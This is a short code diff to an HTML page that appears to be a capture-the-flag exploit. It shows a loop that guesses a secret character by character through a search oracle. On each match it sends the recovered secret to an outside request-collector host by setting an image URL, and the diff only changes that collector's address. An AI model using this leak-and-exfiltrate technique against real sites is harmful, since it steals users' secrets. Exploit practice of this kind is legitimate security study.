--- a/index.html
+++ b/index.html
@@ -33,7 +33,7 @@
             for (let c of chars) {
                 if (await search(secret + c)) {
                     secret += c;
-                    img.src = `https://hllaaac.request.dreamhack.games/${secret}`;
+                    img.src = `https://wojvjpj.request.dreamhack.games/${secret}`;
                     break;
                 }
             }
